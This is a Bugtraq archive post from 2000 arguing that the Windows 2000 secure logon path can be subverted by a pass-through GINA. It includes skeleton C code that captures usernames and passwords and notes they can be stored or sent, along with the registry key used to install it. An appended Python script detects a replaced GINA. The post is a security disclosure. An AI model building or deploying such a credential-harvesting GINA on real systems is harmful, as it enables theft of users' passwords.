Bugtraq mailing list archives
Re: Windows 2000 Run As... Feature
From: jdglaser () NTOBJECTIVES COM (jdglaser)
Date: Mon, 24 Jan 2000 06:31:31 -0800
That's a good point. I'd like to add that MS Secure Attention Sequence is not exactly so trusted. Nothing prevents another Gina from being put into play, nor prevents process code injection - DLL API hooking.

One way to do this can be done by altering the reg key

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

to implement a Pass-Through Gina (one which grabs your password and then calls through to the real Gina).

While SAS prevents the old-style pop and disappear logon screens, it does nothing to prevent password interception by trojan dll injection. Both of these compromise the trust of the current SAS implementation. In light of that, I'm not sure another password path matters.

Just my thoughts,
jdg

Attached is an example of GINA pass-through code - pop the below listed code into a dll, write the dll name as the value to the above listed key and SAS now has an untrusted element.

    int WINAPI WlxLoggedOutSAS (PVOID pWlxContext,
                                DWORD dwSasType,
                                PLUID pAuthenticationId,
                                PSID pLogonSid,
                                PDWORD pdwOptions,
                                PHANDLE phToken,
                                PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
                                PVOID *pProfile)
    {
        //call real gina api
        iRet = GWlxLoggedOutSAS (pWlxContext, dwSasType, pAuthenticationId,
                                 pLogonSid, pdwOptions, phToken,
                                 pMprNotifyInfo, pProfile);

        pMprNotifyInfo->pszUserName,   <-Grab this
        pMprNotifyInfo->pszPassword,   <-Grab this

        <insert whatever>
        hFile = CreateFile ();         <-Store it, send it, mail it
        WriteFile ();
        CloseHandle (hFile);

        return iRet;
    }

-----Original Message-----
From: David Terrell [SMTP:dbt () meat net]
Sent: Friday, January 21, 2000 3:49 PM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Windows 2000 Run As... Feature
this is the first time (I know of) that the system asks for your password through a mechanism other than the trusted path (ctrl-alt-del to login,
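
A defender-side check for the registry change described in the message above, as an added example that is not part of the original post: it parses a text export of the registry and reports whether the Winlogon key names a GINA other than the stock one. The value name `GinaDLL`, the default `msgina.dll`, the function names and the sample exports are assumptions or constructed data, not taken from the message.

```python
import re

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
DEFAULT_GINA = "msgina.dll"  # stock GINA; Winlogon loads it when GinaDLL is absent

# Constructed sample exports (regedit text format, already decoded to str).
SAMPLE_REPLACED = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
"GinaDLL"="C:\\WINNT\\Temp\\passthru.dll"
'''
SAMPLE_STOCK = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
'''

VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

def parse_reg_export(text):
    """Return {key_lower: {value_name_lower: data}} for string values only."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            # .reg files escape backslash and quote with a leading backslash
            name, data = (re.sub(r'\\(.)', r'\1', g) for g in m.groups())
            current[name.lower()] = data
    return keys

def audit_gina(text):
    """Classify the configured GINA as 'default', 'replaced' or 'unknown'."""
    values = parse_reg_export(text).get(WINLOGON_KEY.lower())
    if values is None:
        return ("unknown", None)          # Winlogon key not in this export
    gina = values.get("ginadll")
    if gina is None:
        return ("default", DEFAULT_GINA)  # value absent: stock GINA is used
    if gina.strip().lower() == DEFAULT_GINA:
        return ("default", gina)
    # Any other name, or msgina.dll under an explicit path, needs review;
    # some legitimate software also installed its own GINA.
    return ("replaced", gina)

if __name__ == "__main__":
    for label, sample in (("replaced", SAMPLE_REPLACED), ("stock", SAMPLE_STOCK)):
        print(label, audit_gina(sample))
```

A `replaced` result only says which DLL Winlogon will load; that file still has to be identified and its origin checked.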